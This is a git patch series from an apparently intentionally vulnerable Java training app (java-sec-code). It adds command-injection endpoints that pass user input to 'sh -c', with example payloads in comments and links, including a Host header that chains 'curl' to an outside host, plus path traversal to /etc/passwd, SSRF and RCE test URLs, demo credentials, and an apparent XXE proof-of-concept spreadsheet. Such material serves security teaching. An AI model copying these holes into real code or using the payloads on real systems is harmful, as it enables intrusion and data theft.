     private String emptyReferer(HttpServletRequest request) {
@@ -72,7 +74,7 @@ private String emptyReferer(HttpServletRequest request) {
      * http://localhost:8080/jsonp/advice?_callback=test
      *
      * @return Only return object, AbstractJsonpResponseBodyAdvice can be used successfully.
-     *         Such as JSONOjbect or JavaBean. String type cannot be used.
+     * Such as JSONOjbect or JavaBean. String type cannot be used.
      */
     @RequestMapping(value = "/advice", produces = MediaType.APPLICATION_JSON_VALUE)
     public JSONObject advice(HttpServletRequest request) {
@@ -99,13 +101,12 @@ private String safecode(HttpServletRequest request) {
 
     /**
      * http://localhost:8080/jsonp/getToken
-     * @return token {"token":"115329a7-3a85-4c31-9c02-02fa1bd1fdf8","parameterName":"_csrf","headerName":"X-XSRF-TOKEN"}
      *
+     * @return token {"token":"115329a7-3a85-4c31-9c02-02fa1bd1fdf8","parameterName":"_csrf","headerName":"X-XSRF-TOKEN"}
      */
     @RequestMapping("/getToken")
     public CsrfToken csrf(CsrfToken token) {
         return token;
     }
 
-
 }
\ No newline at end of file
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index c37fbdc6..bdeff180 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,5 +1,5 @@
 
-spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code?useUnicode=true&characterEncoding=utf8&AllowPublicKeyRetrieval=True&useSSL=false&serverTimezone=GMT%2B8
+spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code?useUnicode=true&characterEncoding=utf8&AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=GMT%2B8
 spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver

From 40cf83ba473eb4fc383a54c24cc87425c5fdc132 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 31 Jul 2019 21:28:43 +0800
Subject: [PATCH 055/108] add command inject

---
 .gitignore                                    |  3 +-
 README.md                                     |  6 +-
 README_zh.md                                  |  6 ++
 .../org/joychou/controller/CommandInject.java | 64 +++++++++++++++++++
 .../java/org/joychou/controller/SQLI.java     |  2 +-
 .../org/joychou/controller/XStreamRce.java    |  2 +-
 src/main/java/org/joychou/controller/XXE.java | 36 +++++------
 .../org/joychou/controller/jsonp/JSONP.java   |  1 -
 .../org/joychou/security/SecurityUtil.java    | 12 ++++
 src/main/java/org/joychou/utils/Tools.java    | 25 +++-----
 src/main/resources/application.properties     |  2 +-
 src/main/resources/templates/index.html       |  9 +++
 12 files changed, 127 insertions(+), 41 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/CommandInject.java

diff --git a/.gitignore b/.gitignore
index 80d202f5..2b8dab5d 100644
--- a/.gitignore
+++ b/.gitignore
@@ -5,4 +5,5 @@ other-vuls/
 docker/
 poc/
 src/main/java/org/joychou/test/
-*.iml
\ No newline at end of file
+*.iml
+docker_jdk_build.sh
\ No newline at end of file
diff --git a/README.md b/README.md
index 334b1304..dc3953d9 100644
--- a/README.md
+++ b/README.md
@@ -13,8 +13,12 @@ Each vulnerability type code has a security vulnerability by default unless ther
 
 [Online demo](http://118.25.15.216:8080)
 
+Login username & password:
 
-
+```
+admin/admin123
+joychou/joychou123
+```
 
 
 ## Vulnerability Code
diff --git a/README_zh.md b/README_zh.md
index d02cd483..15743dd6 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -12,6 +12,12 @@
 
 [在线Demo](http://118.25.15.216:8080)
 
+登录用户名密码：
+
+```
+admin/admin123
+joychou/joychou123
+```
 
 ## 漏洞代码
 
diff --git a/src/main/java/org/joychou/controller/CommandInject.java b/src/main/java/org/joychou/controller/CommandInject.java
new file mode 100644
index 00000000..758df64a
--- /dev/null
+++ b/src/main/java/org/joychou/controller/CommandInject.java
@@ -0,0 +1,64 @@
+package org.joychou.controller;
+
+import org.joychou.security.SecurityUtil;
+import org.joychou.utils.Tools;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+@RestController
+public class CommandInject {
+
+    protected final Logger logger = LoggerFactory.getLogger(this.getClass());
+
+    /**
+     * http://localhost:8080/codeinject?filepath=/tmp;pwd
+     *
+     * @param filepath filepath
+     * @return result
+     */
+    @GetMapping("/codeinject")
+    public static String codeInject(String filepath) throws IOException {
+
+        String[] cmdList = new String[]{"sh", "-c", "ls -la " + filepath};
+        ProcessBuilder builder = new ProcessBuilder(cmdList);
+        builder.redirectErrorStream(true);
+        Process process = builder.start();
+        return Tools.convertStreamToString(process.getInputStream());
+    }
+
+    /**
+     * Host Injection
+     * host: Host: hacked by joychou;curl ssrf.http.joychou.org
+     * http://localhost:8080/codeinject/host
+     *
+     */
+    @GetMapping("/codeinject/host")
+    public String codeInjectHost(HttpServletRequest request) throws IOException {
+
+        String host = request.getHeader("host");
+        logger.info(host);
+        String[] cmdList = new String[]{"sh", "-c", "curl " + host};
+        ProcessBuilder builder = new ProcessBuilder(cmdList);
+        builder.redirectErrorStream(true);
+        Process process = builder.start();
+        return Tools.convertStreamToString(process.getInputStream());
+    }
+
+    @GetMapping("/codeinject/sec")
+    public static String codeInjectSec(String filepath) throws IOException {
+        String filterFilePath = SecurityUtil.cmdFilter(filepath);
+        if (null == filterFilePath) {
+            return "Bad boy. I got u.";
+        }
+        String[] cmdList = new String[]{"sh", "-c", "ls -la " + filterFilePath};
+        ProcessBuilder builder = new ProcessBuilder(cmdList);
+        builder.redirectErrorStream(true);
+        Process process = builder.start();
+        return Tools.convertStreamToString(process.getInputStream());
+    }
+}
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index 234d67c2..a4344b85 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -21,7 +21,7 @@
 public class SQLI {
 
     private static String driver = "com.mysql.jdbc.Driver";
-    private static String url = "jdbc:mysql://127.0.0.1:3306/java_sec_code";
+    private static String url = "jdbc:mysql://localhost:3306/java_sec_code";
     private static String user = "root";
     private static String password = "woshishujukumima";
 
diff --git a/src/main/java/org/joychou/controller/XStreamRce.java b/src/main/java/org/joychou/controller/XStreamRce.java
index cbcb7a2b..d4c35872 100644
--- a/src/main/java/org/joychou/controller/XStreamRce.java
+++ b/src/main/java/org/joychou/controller/XStreamRce.java
@@ -22,7 +22,7 @@ public class XStreamRce {
      */
     @PostMapping("/xstream")
     public String parseXml(HttpServletRequest request) throws Exception{
-        String xml = Tools.getBody(request);
+        String xml = Tools.getRequestBody(request);
         XStream xstream = new XStream(new DomDriver());
         xstream.fromXML(xml);
         return "xstream";
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 71a9ffe6..e5ea009e 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -34,7 +34,7 @@ public class XXE {
     @RequestMapping(value = "/xmlReader", method = RequestMethod.POST)
     public String xxe_xmlReader(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
             xmlReader.parse( new InputSource(new StringReader(xml_con)) );  // parse xml
@@ -49,7 +49,7 @@ public String xxe_xmlReader(HttpServletRequest request) {
     @RequestMapping(value = "/xmlReader_fix", method = RequestMethod.POST)
     public  String xxe_xmlReader_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             XMLReader xmlReader = XMLReaderFactory.createXMLReader();
@@ -71,7 +71,7 @@ public  String xxe_xmlReader_fix(HttpServletRequest request) {
     @RequestMapping(value = "/SAXBuilder", method = RequestMethod.POST)
     public  String xxe_SAXBuilder(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXBuilder builder = new SAXBuilder();
@@ -86,7 +86,7 @@ public  String xxe_SAXBuilder(HttpServletRequest request) {
     @RequestMapping(value = "/SAXBuilder_fix", method = RequestMethod.POST)
     public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXBuilder builder = new SAXBuilder();
@@ -104,7 +104,7 @@ public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
     @RequestMapping(value = "/SAXReader", method = RequestMethod.POST)
     public  String xxe_SAXReader(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXReader reader = new SAXReader();
@@ -120,7 +120,7 @@ public  String xxe_SAXReader(HttpServletRequest request) {
     @RequestMapping(value = "/SAXReader_fix", method = RequestMethod.POST)
     public  String xxe_SAXReader_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXReader reader = new SAXReader();
@@ -139,7 +139,7 @@ public  String xxe_SAXReader_fix(HttpServletRequest request) {
     @RequestMapping(value = "/SAXParser", method = RequestMethod.POST)
     public String xxe_SAXParser(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXParserFactory spf = SAXParserFactory.newInstance();
@@ -157,7 +157,7 @@ public String xxe_SAXParser(HttpServletRequest request) {
     @RequestMapping(value = "/SAXParser_fix", method = RequestMethod.POST)
     public String xxe_SAXParser_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             SAXParserFactory spf = SAXParserFactory.newInstance();
@@ -177,7 +177,7 @@ public String xxe_SAXParser_fix(HttpServletRequest request) {
     @RequestMapping(value = "/Digester", method = RequestMethod.POST)
     public String xxe_Digester(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             Digester digester = new Digester();
@@ -193,7 +193,7 @@ public String xxe_Digester(HttpServletRequest request) {
     @RequestMapping(value = "/Digester_fix", method = RequestMethod.POST)
     public String xxe_Digester_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             Digester digester = new Digester();
@@ -214,7 +214,7 @@ public String xxe_Digester_fix(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder_return", method = RequestMethod.POST)
     public String xxeDocumentBuilderReturn(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -247,7 +247,7 @@ public String xxeDocumentBuilderReturn(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder", method = RequestMethod.POST)
     public String DocumentBuilder(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -283,7 +283,7 @@ public String DocumentBuilder(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder_fix", method = RequestMethod.POST)
     public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -307,7 +307,7 @@ public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder_xinclude", method = RequestMethod.POST)
     public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
 
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
@@ -343,7 +343,7 @@ public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
     @RequestMapping(value = "/DocumentBuilder_xinclude_fix", method = RequestMethod.POST)
     public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
 
@@ -382,7 +382,7 @@ public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
     @PostMapping("/XMLReader/vul")
     public String XMLReaderVul(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
             SAXParserFactory spf = SAXParserFactory.newInstance();
             SAXParser saxParser = spf.newSAXParser();
@@ -399,7 +399,7 @@ public String XMLReaderVul(HttpServletRequest request) {
     @PostMapping("/XMLReader/fixed")
     public String XMLReaderSec(HttpServletRequest request) {
         try {
-            String xml_con = Tools.getBody(request);
+            String xml_con = Tools.getRequestBody(request);
             System.out.println(xml_con);
             SAXParserFactory spf = SAXParserFactory.newInstance();
             SAXParser saxParser = spf.newSAXParser();
@@ -415,4 +415,4 @@ public String XMLReaderSec(HttpServletRequest request) {
         }
     }
 
-}
+}
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index cfdb1de0..4cd680b3 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -6,7 +6,6 @@
 import org.joychou.security.SecurityUtil;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CsrfToken;
-import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.*;
 
 import javax.servlet.http.HttpServletRequest;
diff --git a/src/main/java/org/joychou/security/SecurityUtil.java b/src/main/java/org/joychou/security/SecurityUtil.java
index c01d88a4..65681836 100644
--- a/src/main/java/org/joychou/security/SecurityUtil.java
+++ b/src/main/java/org/joychou/security/SecurityUtil.java
@@ -6,9 +6,12 @@
 import java.io.UnsupportedEncodingException;
 import java.net.URI;
 import java.net.URLDecoder;
+import java.util.regex.Pattern;
 
 public class SecurityUtil {
 
+    private static final Pattern FILTER_PATTERN = Pattern.compile("^[a-zA-Z0-9_/\\.-]+$") ;
+
     protected static Logger logger = LoggerFactory.getLogger(SecurityUtil.class);
     /**
      * 通过endsWith判断URL是否合法
@@ -106,4 +109,13 @@ public static String pathFilter(String filepath) {
 
         return filepath;
     }
+
+
+    public static String cmdFilter(String input) {
+        if (!FILTER_PATTERN.matcher(input).matches()) {
+            return null;
+        }
+
+        return input;
+    }
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/utils/Tools.java b/src/main/java/org/joychou/utils/Tools.java
index f7b427cd..7e1b1431 100644
--- a/src/main/java/org/joychou/utils/Tools.java
+++ b/src/main/java/org/joychou/utils/Tools.java
@@ -1,29 +1,20 @@
 package org.joychou.utils;
 
 import javax.servlet.http.HttpServletRequest;
-import java.io.BufferedReader;
 import java.io.IOException;
 import java.io.InputStream;
-import java.io.InputStreamReader;
 
 public class Tools {
 
-    // get body
-    public static String getBody(HttpServletRequest request) throws IOException {
+    // Get request body.
+    public static String getRequestBody(HttpServletRequest request) throws IOException {
         InputStream in = request.getInputStream();
-        BufferedReader br = new BufferedReader(new InputStreamReader(in));
-        StringBuffer sb = new StringBuffer("");
-        String temp;
-        while ((temp = br.readLine()) != null) {
-            sb.append(temp);
-        }
-        if (in != null) {
-            in.close();
-        }
-        if (br != null) {
-            br.close();
-        }
-        return sb.toString();
+        return convertStreamToString(in);
     }
 
+    // https://stackoverflow.com/questions/309424/how-do-i-read-convert-an-inputstream-into-a-string-in-java
+    public static String convertStreamToString(java.io.InputStream is) {
+        java.util.Scanner s = new java.util.Scanner(is).useDelimiter("\\A");
+        return s.hasNext() ? s.next() : "";
+    }
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index bdeff180..25ad5e97 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -1,5 +1,5 @@
 
-spring.datasource.url=jdbc:mysql://127.0.0.1:3306/java_sec_code?useUnicode=true&characterEncoding=utf8&AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=GMT%2B8
+spring.datasource.url=jdbc:mysql://localhost:3306/java_sec_code?AllowPublicKeyRetrieval=true&useSSL=false
 spring.datasource.username=root
 spring.datasource.password=woshishujukumima
 spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 05343a2e..15b78a69 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -7,6 +7,15 @@
 <body>
     <p>Hello <span th:text="${user}"></span>.</p>
     <p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
+    <p>
+        <a th:href="@{/codeinject?filepath=/tmp;pwd}">CmdInject</a>&nbsp;&nbsp;
+        <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
+        <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
+        <a th:href="@{/sqli/jdbc/vul?username=joychou}">SqlInject</a>&nbsp;&nbsp;
+        <a th:href="@{/ssrf/urlConnection?url=file:///etc/passwd}">SSRF</a>&nbsp;&nbsp;
+        <a th:href="@{/rce/exec?cmd=whoami}">RCE</a>
+    </p>
+    <p>...</p>
     <a th:href="@{/logout}">logout</a>
 </body>
 </html>
\ No newline at end of file

From 301ffa63263f57b94f377120bc9fc5848c20df81 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 31 Jul 2019 21:31:20 +0800
Subject: [PATCH 056/108] update readme

---
 README.md    | 1 +
 README_zh.md | 1 +
 2 files changed, 2 insertions(+)

diff --git a/README.md b/README.md
index dc3953d9..99e0c939 100644
--- a/README.md
+++ b/README.md
@@ -26,6 +26,7 @@ joychou/joychou123
 Sort by letter.
 
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml)
+- [CommandInject](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CommandInject.java)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)
diff --git a/README_zh.md b/README_zh.md
index 15743dd6..86d260bd 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -22,6 +22,7 @@ joychou/joychou123
 ## 漏洞代码
 
 - [Actuators to RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/resources/logback-online.xml)
+- [CommandInject](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CommandInject.java)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [CRLF Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CRLFInjection.java)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/security/WebSecurityConfig.java)

From 1f57fae21a9ae8690f2627bafb05a035f668e6d3 Mon Sep 17 00:00:00 2001
From: waderwu <waderwu@163.com>
Date: Tue, 3 Sep 2019 15:18:40 +0800
Subject: [PATCH 057/108] fix bug 0.0.0.0 can bypass SSRFChecker

---
 src/main/java/org/joychou/security/SSRFChecker.java | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/java/org/joychou/security/SSRFChecker.java b/src/main/java/org/joychou/security/SSRFChecker.java
index 1dcbf591..6ecba2f2 100644
--- a/src/main/java/org/joychou/security/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/SSRFChecker.java
@@ -82,7 +82,7 @@ public static Boolean isInnerIPByUrl(String url) {
      */
     private static boolean isInnerIp(String strIP){
 
-        String blackSubnetlist[] = {"10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8"};
+        String blackSubnetlist[] = {"10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "0.0.0.0/32"};
 
         for (String subnet: blackSubnetlist) {
             SubnetUtils utils = new SubnetUtils(subnet);

From 1cd9a71fc42d92c3397e4f3a4561e817ef46fce0 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 4 Sep 2019 15:47:32 +0800
Subject: [PATCH 058/108] add xxe

---
 java-sec-code.iml                             |  16 +++-
 poc.xlsx                                      | Bin 0 -> 8334 bytes
 pom.xml                                       |  20 +++++
 .../org/joychou/controller/CommandInject.java |   4 +-
 src/main/java/org/joychou/controller/XXE.java |  39 +++++----
 .../controller/othervulns/ooxmlXXE.java       |  79 ++++++++++++++++++
 .../othervulns/xlsxStreamerXXE.java           |  44 ++++++++++
 .../joychou/security/LoginSuccessHandler.java |  20 ++++-
 src/main/resources/templates/index.html       |   3 +-
 src/main/resources/templates/login.html       |   4 +-
 src/main/resources/templates/xxe_upload.html  |  14 ++++
 xxe.xlsx                                      | Bin 0 -> 9049 bytes
 12 files changed, 217 insertions(+), 26 deletions(-)
 create mode 100644 poc.xlsx
 create mode 100644 src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java
 create mode 100644 src/main/java/org/joychou/controller/othervulns/xlsxStreamerXXE.java
 create mode 100644 src/main/resources/templates/xxe_upload.html
 create mode 100644 xxe.xlsx

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 1f7ef7b5..0140638a 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -61,7 +61,6 @@
     <orderEntry type="library" name="Maven: ognl:ognl:3.0.8" level="project" />
     <orderEntry type="library" name="Maven: org.javassist:javassist:3.21.0-GA" level="project" />
     <orderEntry type="library" name="Maven: org.unbescape:unbescape:1.1.0.RELEASE" level="project" />
-    <orderEntry type="library" name="Maven: org.slf4j:slf4j-api:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: nz.net.ultraq.thymeleaf:thymeleaf-layout-dialect:1.4.0" level="project" />
     <orderEntry type="library" name="Maven: org.codehaus.groovy:groovy:2.4.7" level="project" />
     <orderEntry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
@@ -101,7 +100,7 @@
     <orderEntry type="library" name="Maven: org.springframework.cloud:spring-cloud-netflix-eureka-client:1.2.0.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: com.netflix.eureka:eureka-client:1.4.11" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: org.codehaus.jettison:jettison:1.3.7" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: stax:stax-api:1.0.1" level="project" />
+    <orderEntry type="library" name="Maven: stax:stax-api:1.0.1" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-eventbus:0.3.0" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: com.netflix.netflix-commons:netflix-infix:0.3.0" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: commons-jxpath:commons-jxpath:1.3" level="project" />
@@ -181,5 +180,18 @@
     <orderEntry type="library" name="Maven: com.thoughtworks.xstream:xstream:1.4.10" level="project" />
     <orderEntry type="library" name="Maven: xmlpull:xmlpull:1.1.3.1" level="project" />
     <orderEntry type="library" name="Maven: xpp3:xpp3_min:1.1.4c" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.poi:poi:3.10-FINAL" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml:3.10-FINAL" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.poi:poi-ooxml-schemas:3.10-FINAL" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.xmlbeans:xmlbeans:2.3.0" level="project" />
+    <orderEntry type="library" name="Maven: dom4j:dom4j:1.6.1" level="project" />
+    <orderEntry type="library" name="Maven: com.monitorjbl:xlsx-streamer:2.0.0" level="project" />
+    <orderEntry type="library" name="Maven: com.rackspace.apache:xerces2-xsd11:2.11.1" level="project" />
+    <orderEntry type="library" name="Maven: com.rackspace.eclipse.webtools.sourceediting:org.eclipse.wst.xml.xpath2.processor:2.1.100" level="project" />
+    <orderEntry type="library" name="Maven: edu.princeton.cup:java-cup:10k" level="project" />
+    <orderEntry type="library" name="Maven: com.ibm.icu:icu4j:4.6" level="project" />
+    <orderEntry type="library" name="Maven: xml-resolver:xml-resolver:1.2" level="project" />
+    <orderEntry type="library" name="Maven: xml-apis:xml-apis:1.4.01" level="project" />
+    <orderEntry type="library" name="Maven: org.slf4j:slf4j-api:1.7.22" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/poc.xlsx b/poc.xlsx
new file mode 100644
index 0000000000000000000000000000000000000000..19ef11a5e33e97c5c18eec4a00ae0dad3122a4ef
GIT binary patch
literal 8334
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
